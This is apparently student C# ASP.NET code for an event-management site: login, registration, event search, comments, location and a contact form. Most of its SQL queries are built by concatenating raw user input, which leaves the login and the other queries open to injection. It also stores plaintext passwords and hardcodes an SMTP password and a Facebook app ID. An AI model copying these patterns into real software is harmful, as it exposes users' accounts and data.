// sqlConnection1.Close();
PanelComentariuNou.Visible = false;
Page_Load(sender, e);
}
protected void ComentariuRaspundePosteaza(object sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
Button btn = (Button)sender;
TextBox t = (TextBox)PanelComentarii.FindControl("rsp2");
int idev = Convert.ToInt32(Session["IdEvenimentSelectat"]);
string text = t.Text;
string autor = Session["nume"].ToString();
cmd.CommandText = "INSERT INTO replici (id_eveniment,text,autor,id_parinte) VALUES (" + idev + ",'" + text + "','" + autor + "'," + Convert.ToInt32(btn.ToolTip) + ");";
cmd.CommandType = CommandType.Text;
cmd.ExecuteNonQuery();
Session["idtata"] = null;
sqlConnection1.Close();
PanelComentariuNou.Visible = false;
ButtonForum_Click(sender, e);
}
protected void ButtonAdaugaRol2_Click1(object sender, EventArgs e)
{
}
protected void Button_EvenimenteFeatured_Click(object sender, EventArgs e)
{
Response.Redirect("EvenimenteFeatured.aspx");
}
protected void Afiseaza_NumarParticipanti()
{
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
try
{
sqlConnection1.Open();
cmd.CommandText = "select count(id_utilizator) from participa where id_eveniment = " + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
nr_part.Text = cmd.ExecuteScalar().ToString();
sqlConnection1.Close();
}
catch (Exception ex)
{
MesajRaspuns.Text = " eroare in functia de afisare participanti "+ex.Message;
}
}
//protected void ButtonEditeazaLocatie_Click(object sender, EventArgs e)
//{
// textbox_latitudine.Visible = true;
// textbox_longitudine.Visible = true;
// ButtonIntroduceDateLocatie.Visible = true;
// ButtonLocatie.Visible = false;
// SqlCommand cmd = new SqlCommand();
// try
// {
// sqlConnection1.Open();
// cmd.Connection = sqlConnection1;
// cmd.CommandText = "select count(*) from locatie where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
// cmd.CommandType = CommandType.Text;
// if (Convert.ToInt32(cmd.ExecuteScalar()) != 0)
// {
// cmd.CommandText = "select latitudine,longitutine from locatie where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
// cmd.CommandType = CommandType.Text;
// using (SqlDataReader SRD = cmd.ExecuteReader())
// {
// SRD.Read();
// {
// //MesajRaspuns.Text = "2";
// textbox_latitudine.Text = (SRD.GetDouble(0).ToString());
// textbox_longitudine.Text = (SRD.GetDouble(1).ToString());
// //MesajRaspuns.Text += "3";
// Session["locatie"] = "da";
// }
// }
// }
// else
// Session["locatie"] = "nu";
// }
// catch (Exception ex)
// {
// MesajRaspuns.Text = "eroareeeeeeeeeeeee in ButtonEditeazaLocatie_Click " + ex.Message;
// }
// sqlConnection1.Close();
// // MesajRaspuns.Text = Session["locatie"].ToString();
//}
protected void editareLocatie() // apelez in page load daca este proprietar
{
SqlCommand cmd = new SqlCommand();
try
{
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "select count(*) from locatie where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
if (Convert.ToInt32(cmd.ExecuteScalar()) != 0)
{
cmd.CommandText = "select latitudine,longitutine from locatie where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
using (SqlDataReader SRD = cmd.ExecuteReader())
{
SRD.Read();
{
//MesajRaspuns.Text = "2";
textbox_latitudine.Text = (SRD.GetDouble(0).ToString());
textbox_longitudine.Text = (SRD.GetDouble(1).ToString());
MesajRaspuns.Text += "3";
Session["locatie"] = "da";
}
}
}
else
Session["locatie"] = "nu";
}
catch (Exception ex)
{
MesajRaspuns.Text = "eroareeeeeeeeeeeee in editareLocatie " + ex.Message;
}
sqlConnection1.Close();
}
protected void ButtonSubmitLocatie_Click(object sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
double lat = 90.0, longi = -90.0;
if (Double.TryParse(textbox_latitudine.Text, out lat) == false)
{
MesajRaspuns.Text = "introduceti 2 numere intre -90 si 90";
return;
}
else if (lat > 90 || lat < -90)
{
MesajRaspuns.Text = "introduceti 2 numere intre -90 si 90";
return;
}
if (Double.TryParse(textbox_longitudine.Text, out longi) == false)
{
MesajRaspuns.Text = "introduceti 2 numere intre -90 si 90";
return;
}
else if (longi > 90 || longi < -90)
{
MesajRaspuns.Text = "introduceti 2 numere intre -90 si 90";
return;
}
try
{
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
if (Session["locatie"] == "nu")
{
MesajRaspuns.Text = Session["locatie"].ToString();
cmd.CommandText = "insert into locatie(latitudine,longitutine,id_eveniment) values(" + lat + "," + longi + "," + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ");";
cmd.CommandType = CommandType.Text;
}
else if (Session["locatie"] == "da")
{
cmd.CommandText = "update locatie set latitudine = " + lat + ", longitutine = " + longi + " where id_eveniment = " + Convert.ToInt32(Session["IdEvenimentSelectat"]) + " ;";
cmd.CommandType = CommandType.Text;
MesajRaspuns.Text += Session["locatie"].ToString();
}
cmd.ExecuteNonQuery();
MesajRaspuns.Text += Session["locatie"].ToString();
//if (Convert.ToInt32(cmd.ExecuteScalar()) != 0)
//{
// cmd.CommandText = "select latitudine,longitutine from locatie where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
// cmd.CommandType = CommandType.Text;
// using (SqlDataReader SRD = cmd.ExecuteReader())
// {
// while (SRD.Read())
// {
// MesajRaspuns.Text = "2";
// lat = (SRD.GetDouble(0));
// longi = (SRD.GetDouble(1));
// MesajRaspuns.Text += "3";
// }
// }
//}
}
catch (Exception ex)
{
MesajRaspuns.Text += "eroareeeeeeeeeeeee in editeaza locatie " + ex.Message;
}
sqlConnection1.Close();
// Response.Redirect("Eveniment.aspx");
}
}<file_sep>/PIP/Contact.aspx.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
//using System.Web.Mail;
using System.Net.Mail;
public partial class Contact : System.Web.UI.Page
{
protected void Page_Load(object sender, EventArgs e)
{
}
protected void TextBox1_TextChanged(object sender, EventArgs e)
{
}
protected void Button_sendEmail_Click(object sender, EventArgs e)
{
string fromEmail = email.Text;
string BodyEmail = mesaj.Text;
string nume = nume_sender.Text;
string subject = subiect.Text;
if ((fromEmail == "") || (BodyEmail == "") || (nume == "") || (subject == ""))
{
MesajEroare.Text = "Completati toate campurile";
return;
}
MailMessage msg = new MailMessage();
System.Net.Mail.SmtpClient client = new System.Net.Mail.SmtpClient();
try {
msg.Subject = subject;
msg.Body = BodyEmail;
msg.From = new MailAddress(fromEmail);
msg.To.Add("<EMAIL>");
msg.IsBodyHtml = true;
client.Host = "smtp.gmail.com";
System.Net.NetworkCredential basicauthenticationinfo = new System.Net.NetworkCredential("<EMAIL>", "ingineria");
client.Port = int.Parse("587");
client.EnableSsl = true;
client.UseDefaultCredentials = false;
client.Credentials = basicauthenticationinfo;
client.DeliveryMethod = SmtpDeliveryMethod.Network;
client.Send(msg);
} catch (Exception ex) {
throw new Exception();
}
Response.Redirect("Contact.aspx");
//return Redirect(HttpContext.Request.UrlReferrer.AbsoluteUri);
}
}<file_sep>/PIP/EvenimenteFeatured.aspx.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Data;
using System.Data.SqlClient;
using System.Web.UI.HtmlControls;
using System.IO;
using System.Data.OleDb;
public partial class EvenimenteFeatured : System.Web.UI.Page
{
protected void Page_Load(object sender, EventArgs e)
{
afisareEvenimenteAsemanatoare();
}
SqlConnection sqlConnection1 = new SqlConnection(@"Data Source=(LocalDB)\v11.0;AttachDbFilename='C:\Users\Domanitos\Downloads\PIPv36\PIP\App_Data\PIP.mdf';Integrated Security=True;MultipleActiveResultSets=True;Application Name=EntityFramework");
protected void afisareEvenimenteAsemanatoare()
{
int id = Convert.ToInt32(Session["IdEvenimentSelectat"]);
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandText = "select * from evenimente where id=" + id + ";";
cmd.CommandType = CommandType.Text;
//ButtonEvenimenteCreate.ToolTip = "1";
//ButtonSearch.ToolTip = "0";
// iau etichetele, data inceperii si orasul penru a vedea daca mai gasesc si alte evenimente cu aceleasi caracteristici
string etichete = "%", oras = "%" ; //in etichete este si orasul
DateTime data=DateTime.Now;
try
{
sqlConnection1.Open();
SqlDataReader InfoEvent = cmd.ExecuteReader();
while (InfoEvent.Read())
{
etichete = InfoEvent.GetString(InfoEvent.GetOrdinal("etichete"));
oras = InfoEvent.GetString(InfoEvent.GetOrdinal("oras"));
data = InfoEvent.GetDateTime(InfoEvent.GetOrdinal("data_inceperii"));
}
sqlConnection1.Close();
}
catch (Exception ex)
{
LabelMesajEroare.Text += "Eroare in functia afisareInfoFeatured " + ex.Message;
}
try
{
cmd.CommandText = "select * from evenimente where (etichete like '" + etichete + "' or ( data_inceperii = '" + data + "' and oras= '" + oras + "') or data_inceperii = '" + data + "' or oras= '" + oras + "') and id !=" + id + " ;";
cmd.CommandType = CommandType.Text;
sqlConnection1.Open();
DataTable Table_Evenimente = new DataTable();
if (Table_Evenimente.Columns.Count == 0)
{
Table_Evenimente.Columns.Add("Titlu", typeof(string));
Table_Evenimente.Columns.Add("Data", typeof(string));
Table_Evenimente.Columns.Add("Locatie", typeof(string));
}
List<int> idevenimetfeatured = new List<int>();
List<string> numeFiecareEveniment = new List<string>();
int contor = 0;
SqlDataReader InfoEvenimente = cmd.ExecuteReader();
while (InfoEvenimente.Read())
{
DataRow NewRow = Table_Evenimente.NewRow(); //un nou rand!!!
NewRow[0] = InfoEvenimente.GetString(1);
// NewRow[1] = InfoEvenimente.GetString(1);
numeFiecareEveniment.Add(InfoEvenimente.GetString(InfoEvenimente.GetOrdinal("nume")));
idevenimetfeatured.Add(InfoEvenimente.GetInt32(InfoEvenimente.GetOrdinal("id")));
NewRow[1] = InfoEvenimente.GetDateTime(InfoEvenimente.GetOrdinal("data_inceperii")).ToString("dd MM yyyy");
//LabelMesajEroare.Text += " Opa ";
NewRow[2] = InfoEvenimente.GetString(InfoEvenimente.GetOrdinal("oras"));
//LabelMesajEroare.Text += " Opa ";
Table_Evenimente.Rows.Add(NewRow);
// contor++;
}
InfoEvenimente.Close();
// LabelMesajEroare.Text = " contor = " + contor + " ";
//}
GridViewFeatured.DataSource = Table_Evenimente;
GridViewFeatured.DataBind();
int index_eveniment = 0; //pentru fiecare id de eveniment
foreach (GridViewRow row in GridViewFeatured.Rows)
{
int i = 0;
LinkButton spre = new LinkButton();
spre.ID = "LinkEveniment" + idevenimetfeatured[index_eveniment].ToString(); //fiecare buton are id-ul evenimentului pe care il refera
spre.Text = numeFiecareEveniment[index_eveniment].ToString();
spre.Click += new EventHandler(toPaginaEvenimentAccesat);
spre.ToolTip = "ev_creat";
row.Cells[i].Controls.Add(spre);
// LabelMesajEroare.Text += spre.ID + " i = " + i + " ";
index_eveniment++;
}
// LabelMesajEroare.Text += " index eveniment "+index_eveniment + " " ;
}
catch (Exception ex)
{
LabelMesajEroare.Text += "Eroare in functia afisareInfoFeatured " + ex.Message;
}
sqlConnection1.Close();
}
protected void toPaginaEvenimentAccesat(object sender, EventArgs e)
{
LinkButton x = (LinkButton)sender;
if (x.ToolTip == "ev_creat")
{
Session["IdEvenimentSelectat"] = Convert.ToInt32(x.ID.Substring(13));
//SearchBox.Text = Session["IdEvenimentSelectat"].ToString();
// okk++;
// LabelMesajEroare.Text += " in catrepag " + Session["IdEvenimentSelectat"] + " ";
Response.Redirect("Eveniment.aspx");
}
}
protected void inapoi_Click(object sender, EventArgs e)
{
Response.Redirect("Eveniment.aspx");
}
}<file_sep>/PIP/BaraDeNavigare_MasterPage.master.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Data;
using System.Data.SqlClient;
using System.Collections;
public class FaceBookUser
{
public string Id { get; set; }
public string Name { get; set; }
public string UserName { get; set; }
public string PictureUrl { get; set; }
public string Email { get; set; }
}
public partial class BaraDeNavigare_MasterPage : System.Web.UI.MasterPage
{
SqlConnection sqlConnection1 = new SqlConnection(@"Data Source=(LocalDB)\v11.0;AttachDbFilename='C:\Users\Domanitos\Downloads\PIPv36\PIP\App_Data\PIP.mdf';Integrated Security=True;MultipleActiveResultSets=True;Application Name=EntityFramework");
protected void Page_Load(object sender, EventArgs e)
{
if (Session["nume"] == null)
{
LinkButtoninregistrare.Visible = true;
LinkButtonlogin.Visible = true;
LinkButtonlogout.Visible = false;
LinkButtonprofil.Visible = false;
}
else
{
LinkButtoninregistrare.Visible = false;
LinkButtonlogin.Visible = false;
LinkButtonlogout.Visible = true;
LinkButtonprofil.Visible = true;
nume_logat.Text = "" + ((string)Session["nume"]);
}
}
protected void profil_click(object sender, EventArgs e)
{
Response.Redirect("profil.aspx");
LinkButtoninregistrare.Visible = false;
LinkButtonlogin.Visible = false;
LinkButtonlogout.Visible = true;
LinkButtonprofil.Visible = true;
}
protected void inregistrare_click(object sender, EventArgs e)
{
Panellogin.Visible = false;
Panelinreg.Visible = true;
}
protected void home_click(object sender, EventArgs e)
{
Response.Redirect("homepage.aspx");
}
protected void login_click(object sender, EventArgs e)
{
Panellogin.Visible = true;
Panelinreg.Visible = false;
}
protected void logout_click(object sender, EventArgs e)
{
Session["nume"] = null;
Session["id"] = null;
nume_logat.Text = "";
LinkButtoninregistrare.Visible = true;
LinkButtonlogin.Visible = true;
LinkButtonlogout.Visible = false;
LinkButtonprofil.Visible = false;
Response.Redirect("homepage.aspx"); // redirectionare catre home cand da logout
}
protected void Buttoncreare_Click(object sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
int nr = 0;
Labelinregeroare.Text = "";
if ((TextBoxacont.Text == "") || (TextBoxparola.Text == "") || (TextBoxparola2.Text == ""))
{
Labelinregeroare.Text = "Va rugam sa completati toate campurile obligatorii";
return;
}
if (TextBoxparola.Text != TextBoxparola2.Text)
{
Labelinregeroare.Text = "Confirmarea parolei a esuat!";
return;
}
sqlConnection1.Open();
cmd.CommandText = "SELECT COUNT(acont) FROM utilizator where '" + TextBoxacont.Text + "'=acont";
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
nr = Convert.ToInt32(cmd.ExecuteScalar());
if (nr != 0)
{
Labelinregeroare.Text = "Numele acontului este deja luat!";
return;
}
cmd.CommandText = "SELECT COUNT(acont) FROM utilizator where '" + TextBoxemail.Text + "'=email";
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
nr = Convert.ToInt32(cmd.ExecuteScalar());
if (nr != 0)
{
Labelinregeroare.Text = "Emailul este deja folosit!";
return;
}
if (TextBoxnume.Text == "")
TextBoxnume.Text = " ";
if (TextBoxprenume.Text == "")
TextBoxprenume.Text = " ";
cmd = new SqlCommand("INSERT INTO utilizator(acont, nume, prenume, email, parola) VALUES('" + TextBoxacont.Text.ToString() + "','" + TextBoxnume.Text.ToString() + "','" + TextBoxprenume.Text.ToString() + "','" + TextBoxemail.Text.ToString() + "','" + TextBoxparola.Text.ToString() + "')", sqlConnection1);
cmd.ExecuteNonQuery();
sqlConnection1.Close();
Labelinregeroare.Text = "Inregistrare reusita";
Buttoncreare.Enabled = false;
}
protected void Buttonascunde_Click(object sender, EventArgs e)
{
Panelinreg.Visible = false;
}
protected void Buttonlogin_Click(object sender, EventArgs e)
{
// SqlConnection sqlConnection1 = new SqlConnection(@"Data Source=(LocalDB)\v11.0;AttachDbFilename=C:\Users\Domanitos\Downloads\creareevenimente\PIP\App_Data\PIP.mdf;Integrated Security=True");
SqlCommand cmd = new SqlCommand();
int nr = 0;
Labellogineroare.Text = "";
if (TextBoxlogina.Text == "")
{
Labellogineroare.Text = "Introduceti acont!";
return;
}
if (TextBoxloginp.Text == "")
{
Labellogineroare.Text = "Introduceti o parola!";
return;
}
sqlConnection1.Open();
cmd.CommandText = "SELECT COUNT(acont) FROM utilizator where '" + TextBoxloginp.Text + "'=parola AND '" + TextBoxlogina.Text + "'=acont;";
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
nr = Convert.ToInt32(cmd.ExecuteScalar());
if (nr == 0)
{
Labellogineroare.Text = "Acont sau parola gresita!";
return;
}
cmd.CommandText = "SELECT id FROM utilizator where '" + TextBoxloginp.Text + "'=parola AND '" + TextBoxlogina.Text + "'=acont;";
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
int id = Convert.ToInt32(cmd.ExecuteScalar());
sqlConnection1.Close();
Session["nume"] = TextBoxlogina.Text;
Session["id"] = id;
nume_logat.Text = "" + TextBoxlogina.Text;
Panellogin.Visible = false;
LinkButtoninregistrare.Visible = false;
LinkButtonlogin.Visible = false;
LinkButtonlogout.Visible = true;
LinkButtonprofil.Visible = true;
Response.Redirect("homepage.aspx");
}
protected void contact_click(object sender, EventArgs e)
{
Response.Redirect("Contact.aspx");
}
}
<file_sep>/PIP/homepage.aspx.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Data;
using System.Data.SqlClient;
using System.Collections;
using System.Text.RegularExpressions;
using ASPSnippets.FaceBookAPI;
using System.Web.Script.Serialization;
public partial class homepage : System.Web.UI.Page
{
SqlConnection sqlConnection1 = new SqlConnection(@"Data Source=(LocalDB)\v11.0;AttachDbFilename='C:\Users\Domanitos\Downloads\PIPv36\PIP\App_Data\PIP.mdf';Integrated Security=True;MultipleActiveResultSets=True;Application Name=EntityFramework");
bool ok = false;
protected void Page_Load(object sender, EventArgs e)
{
if (Session["nume"] == null)
{
ButtonCreareEveniment.Visible = false;
ButtonEvenimenteCreate.Visible = false;
// ButtonEvenimenteCreateAscunde.Visible = false;
Button_EvenimenteOrganizate.Visible = false;
// Button_EvenimenteOrganizateAscunde.Visible = false;
btnLoginFacebook.Visible = true;
}
else
{
invitatiiCaOrganizator();
ButtonCreareEveniment.Visible = true;
ButtonEvenimenteCreate.Visible = true;
// ButtonEvenimenteCreateAscunde.Visible = true;
Button_EvenimenteOrganizate.Visible = true;
btnLoginFacebook.Visible = false;
}
featurednelogat(sender, e);
if (ButtonSearch.ToolTip == "1")
ButtonSearch_Click(sender, e);
if (ButtonEvenimenteCreate.ToolTip == "1")
{
ButtonCreate_Click(sender, e);
//LabelMesajEroare.Text += "DA";
}
if (Button_EvenimenteOrganizate.ToolTip == "1")
{
Button_EvenimenteOrganizate_Click(sender, e);
}
//if(GridView_listaEvenimenteOrganizate.ToolTip == "0")
//GridViewFeatured.Visible = false;
//if (GridView_listaEvenimenteOrganizate.ToolTip == "0")
//LabelMesajEroare.Text += okk;
if (Session["nume"] != null)
{
evenimente_participa();
}
FaceBookConnect.API_Key = "523932864394077";
FaceBookConnect.API_Secret = "<KEY>";
if (!IsPostBack)
{
if (Request.QueryString["error"] == "access_denied")
{
//ClientScript.RegisterStartupScript(this.GetType(), "alert", "alert('User has denied access.')", true);
return;
}
string code = Request.QueryString["code"];
if (!string.IsNullOrEmpty(code))
{
string data = FaceBookConnect.Fetch(code, "me");
FaceBookUser faceBookUser = new JavaScriptSerializer().Deserialize<FaceBookUser>(data);
faceBookUser.PictureUrl = string.Format("https://graph.facebook.com/{0}/picture", faceBookUser.Id);
//lblId.Text = faceBookUser.Id;
//Session["nume"] = faceBookUser.UserName;
//lblEmail.Text = faceBookUser.Email;
SqlCommand cmd = new SqlCommand();
cmd.CommandText = "SELECT id, acont, email, parola FROM utilizator;";
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
sqlConnection1.Open();
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
if ((faceBookUser.Email == SRD.GetString(SRD.GetOrdinal("email"))) && (faceBookUser.Id == SRD.GetString(SRD.GetOrdinal("parola"))))
{
Session["nume"] = SRD.GetString(SRD.GetOrdinal("acont"));
Session["id"] = SRD.GetInt32(SRD.GetOrdinal("id"));
ok = true;
}
}
}
sqlConnection1.Close();
if (!ok)
{
SqlCommand cmd2 = new SqlCommand();
cmd2.CommandText = "INSERT INTO utilizator(acont, email, parola, nume, prenume) VALUES('" + faceBookUser.Name + "','" + faceBookUser.Email + "','" + faceBookUser.Id + "', '', '')";
cmd2.CommandType = CommandType.Text;
cmd2.Connection = sqlConnection1;
sqlConnection1.Open();
cmd2.ExecuteNonQuery();
sqlConnection1.Close();
SqlCommand cmd3 = new SqlCommand();
cmd3.CommandText = "SELECT id, acont, email, parola FROM utilizator;";
cmd3.CommandType = CommandType.Text;
cmd3.Connection = sqlConnection1;
sqlConnection1.Open();
using (SqlDataReader SRD = cmd3.ExecuteReader())
{
while (SRD.Read())
{
if ((faceBookUser.Email == SRD.GetString(SRD.GetOrdinal("email"))) && (faceBookUser.Id == SRD.GetString(SRD.GetOrdinal("parola"))))
{
Session["nume"] = SRD.GetString(SRD.GetOrdinal("acont"));
Session["id"] = SRD.GetInt32(SRD.GetOrdinal("id"));
ok = true;
}
}
}
sqlConnection1.Close();
}
btnLoginFacebook.Visible = false;
Response.Redirect("homepage.aspx");
}
}
}
protected void LoginFacebook(object sender, EventArgs e)
{
FaceBookConnect.Authorize("user_photos,email", Request.Url.AbsoluteUri.Split('?')[0]);
}
protected void ButtonSearch_Click(object sender, EventArgs e)
{
ButtonEvenimenteCreate.ToolTip = "0";
// Button_EvenimenteOrganizate.ToolTip = "0";
ButtonSearch.ToolTip = "1";
GridView_listaEvenimenteOrganizate.ToolTip = "0";
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
// cmd.CommandText = "select * from evenimente where nume = '" + SearchBox.Text + "';";
cmd.CommandType = CommandType.Text;
cmd.CommandText = "select * from evenimente ";
if (SearchBox.Text != "")
{
String[] cuvinteSearchBox = SearchBox.Text.Split(' ');
ArrayList cuvinteCautate = new ArrayList();
foreach (String cuvant in cuvinteSearchBox)
{ // elimin elementele de tipul ""
if (cuvant != "")
{
cuvinteCautate.Add(cuvant);
}
}
if (cuvinteCautate.Count == 0)
{ // caz special cand se introduce in search box doar spatiu
return;
}
for (int pasCuvant = 0; pasCuvant < cuvinteCautate.Count; pasCuvant++)
{
if (pasCuvant == cuvinteCautate.Count - 1)
{
if (pasCuvant == 0)
cmd.CommandText += " where ( etichete like '%" + cuvinteCautate[pasCuvant] + "%' )" + " or nume = '" + SearchBox.Text + "';";
else
cmd.CommandText += " ( etichete like '%" + cuvinteCautate[pasCuvant] + "%' )" + " or nume = '"+SearchBox.Text+"';";
}
else
{
if (pasCuvant == 0)
{
cmd.CommandText += " where ( etichete like '%" + cuvinteCautate[pasCuvant] + "%' )" + " or ";
}
else
{
cmd.CommandText += " ( etichete like '%" + cuvinteCautate[pasCuvant] + "%' )" + " or ";
}
}
}
//LabelMesajEroare.Text = cmd.CommandText;
//-----------------------------------
try
{
sqlConnection1.Open();
DataTable Table_Evenimente = new DataTable();
if (Table_Evenimente.Columns.Count == 0)
{
Table_Evenimente.Columns.Add("Titlu", typeof(string));
Table_Evenimente.Columns.Add("Data", typeof(string));
Table_Evenimente.Columns.Add("Locatie", typeof(string));
}
List<int> idevenimetfeatured = new List<int>();
List<string> numeFiecareEveniment = new List<string>();
int contor = 0;
//using (SqlDataReader evenimetfeatured = cmd.ExecuteReader())
//{
// while (evenimetfeatured.Read())
// {
// //contor++;
// }
// evenimetfeatured.Close();
//}
//LabelMesajEroare.Text = " contor = "+contor +" ";
//foreach (int idEvent in idevenimetfeatured)
//{
SqlDataReader InfoEvenimente = cmd.ExecuteReader();
while (InfoEvenimente.Read())
{
DataRow NewRow = Table_Evenimente.NewRow(); //un nou rand!!!
NewRow[0] = InfoEvenimente.GetString(1);
// NewRow[1] = InfoEvenimente.GetString(1);
numeFiecareEveniment.Add(InfoEvenimente.GetString(InfoEvenimente.GetOrdinal("nume")));
idevenimetfeatured.Add(InfoEvenimente.GetInt32(InfoEvenimente.GetOrdinal("id")));
NewRow[1] = InfoEvenimente.GetDateTime(InfoEvenimente.GetOrdinal("data_inceperii")).ToString("dd MM yyyy");
//LabelMesajEroare.Text += " Opa ";
NewRow[2] = InfoEvenimente.GetString(InfoEvenimente.GetOrdinal("oras"));
//LabelMesajEroare.Text += " Opa ";
Table_Evenimente.Rows.Add(NewRow);
// contor++;
}
InfoEvenimente.Close();
// LabelMesajEroare.Text = " contor = " + contor + " ";
//}
GridViewFeatured.DataSource = Table_Evenimente;
GridViewFeatured.DataBind();
int index_eveniment = 0; //pentru fiecare id de eveniment
foreach (GridViewRow row in GridViewFeatured.Rows)
{
int i = 0;
LinkButton spre = new LinkButton();
spre.ID = "LinkEveniment" + idevenimetfeatured[index_eveniment].ToString(); //fiecare buton are id-ul evenimentului pe care il refera
spre.Text = numeFiecareEveniment[index_eveniment].ToString();
spre.Click += new EventHandler(toPaginaEvenimentAccesat);
spre.ToolTip = "ev_creat";
row.Cells[i].Controls.Add(spre);
// LabelMesajEroare.Text += spre.ID + " i = " + i + " ";
index_eveniment++;
}
// LabelMesajEroare.Text += " index eveniment " + index_eveniment + " ";
}
catch (Exception ex)
{
LabelMesajEroare.Text += "Eroare in functia ButtonCreate_CLick " + ex.Message;
}
//sqlConnection1.Open();
//if (((Label)Panelsearch.FindControl("k1")) == null)
//{
// Label k = new Label();
// k.ID = "k1";
// k.Text = "<h2>Rezultatele cautarii:</h2>";
// Panelsearch.Controls.Add(k);
//}
//using (SqlDataReader SRD = cmd.ExecuteReader())
//{
// while (SRD.Read())
// {
// LinkButton btn = new LinkButton();
// btn.ID = "LinkEveniment" + SRD.GetInt32(SRD.GetOrdinal("id")).ToString();
// if (((LinkButton)Panelsearch.FindControl(btn.ID)) == null)
// {
// ButtonSearch.ToolTip = "1";
// btn.ID = "LinkEveniment" + SRD.GetInt32(SRD.GetOrdinal("id")).ToString();
// btn.Text = SRD.GetString(SRD.GetOrdinal("nume")).ToString();
// btn.Click += new EventHandler(butoneveniment);
// Panelsearch.Controls.Add(btn);
// //Panelsearch.Controls.Add(new LiteralControl("<br />"));
// //Label l2 = new Label();
// //l2.Text = "Nume: " + SRD.GetString(SRD.GetOrdinal("nume")).ToString();
// //Panelsearch.Controls.Add(l2);
// //Panelsearch.Controls.Add(new LiteralControl("</br>"));
// Label l3 = new Label();
// if (Convert.IsDBNull(SRD["descriere"])) l3.Text = "";
// else l3.Text = "<br />Descriere :" + SRD.GetString(SRD.GetOrdinal("descriere")).ToString();
// l3.Visible = false;
// Panelsearch.Controls.Add(l3);
// Label l4 = new Label();
// if (Convert.IsDBNull(SRD["data_inceperii"])) l4.Text = "";
// else l4.Text = "<br />"+"Data :" + SRD.GetDateTime(SRD.GetOrdinal("data_inceperii")).ToString();
// Panelsearch.Controls.Add(l4);
// Label l5 = new Label();
// l5.Text = "<br />";
// if (Convert.IsDBNull(SRD["oras"])) l5.Text += "";
// else l5.Text += " "+SRD.GetString(SRD.GetOrdinal("oras")).ToString();
// if (Convert.IsDBNull(SRD["judet"])) l5.Text += "";
// else l5.Text += " "+SRD.GetString(SRD.GetOrdinal("judet")).ToString();
// if (Convert.IsDBNull(SRD["tara"])) l5.Text += "";
// else l5.Text += " "+SRD.GetString(SRD.GetOrdinal("tara")).ToString();
// Panelsearch.Controls.Add(l5);
// Label l = new Label();
// l.Text = "<p>ID: " + SRD.GetInt32(SRD.GetOrdinal("Id")).ToString() + "</p>";
// l.Visible = false;
// Panelsearch.Controls.Add(l);
// //Panelsearch.Controls.Add(new LiteralControl("<br />"));
// Panelsearch.Controls.Add(new LiteralControl("<p></p>"));
// }
// }
//}
sqlConnection1.Close();
}
}
protected void ButtonCreate_Click(object sender, EventArgs e)
{
GridView_listaEvenimenteOrganizate.ToolTip = "0";
int id = Convert.ToInt32(Session["id"]);
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandText = "select * from evenimente where id_proprietar=" + id + ";";
cmd.CommandType = CommandType.Text;
ButtonEvenimenteCreate.ToolTip = "1";
ButtonSearch.ToolTip = "0";
//Button_EvenimenteOrganizate.ToolTip = "0";
try
{
sqlConnection1.Open();
DataTable Table_Evenimente = new DataTable();
if (Table_Evenimente.Columns.Count == 0)
{
Table_Evenimente.Columns.Add("Titlu", typeof(string));
Table_Evenimente.Columns.Add("Data", typeof(string));
Table_Evenimente.Columns.Add("Locatie", typeof(string));
}
List<int> idevenimetfeatured = new List<int>();
List<string> numeFiecareEveniment = new List<string>();
int contor = 0;
//using (SqlDataReader evenimetfeatured = cmd.ExecuteReader())
//{
// while (evenimetfeatured.Read())
// {
// //contor++;
// }
// evenimetfeatured.Close();
//}
//LabelMesajEroare.Text = " contor = "+contor +" ";
//foreach (int idEvent in idevenimetfeatured)
//{
SqlDataReader InfoEvenimente = cmd.ExecuteReader();
while (InfoEvenimente.Read())
{
DataRow NewRow = Table_Evenimente.NewRow(); //un nou rand!!!
NewRow[0] = InfoEvenimente.GetString(1);
// NewRow[1] = InfoEvenimente.GetString(1);
numeFiecareEveniment.Add(InfoEvenimente.GetString(InfoEvenimente.GetOrdinal("nume")));
idevenimetfeatured.Add(InfoEvenimente.GetInt32(InfoEvenimente.GetOrdinal("id")));
NewRow[1] = InfoEvenimente.GetDateTime(InfoEvenimente.GetOrdinal("data_inceperii")).ToString("dd MM yyyy");
//LabelMesajEroare.Text += " Opa ";
NewRow[2] = InfoEvenimente.GetString(InfoEvenimente.GetOrdinal("oras"));
//LabelMesajEroare.Text += " Opa ";
Table_Evenimente.Rows.Add(NewRow);
// contor++;
}
InfoEvenimente.Close();
// LabelMesajEroare.Text = " contor = " + contor + " ";
//}
